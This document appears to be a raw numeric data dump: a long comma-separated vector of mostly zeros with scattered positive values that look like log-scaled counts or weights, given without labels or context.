0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 6.168389232050775, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 8.254681213103192, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 2.1972245773362196, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 16.400167309572016, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 3.4825185607408002, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 1.9459101490553132, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.295836866004329, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.2188758248682006, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.295836866004329, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 2.9444389791664403, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.3978952727983707, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 2.3978952727983707, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.8398715690385097, 0.0, 0.0, 0.0, 5.101797476893978, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 4.394449154672439, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.302585092994046, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 3.178053830347946, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 2.8903717578961645, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 1.9459101490553132, 0, 0.0, 11.29853313840085, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 2.70805020110221, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 6.200409765562088, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 8.873266907405862, 0.0, 0.0, 0.0, 0, 0, 0.0, 2.1972245773362196, 6.351472826488934, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.2188758248682006, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 4.828313737302301, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.2188758248682006, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.5553480614894135, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 5.46286043483228, 3.6375861597263857, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.8903717578961645, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 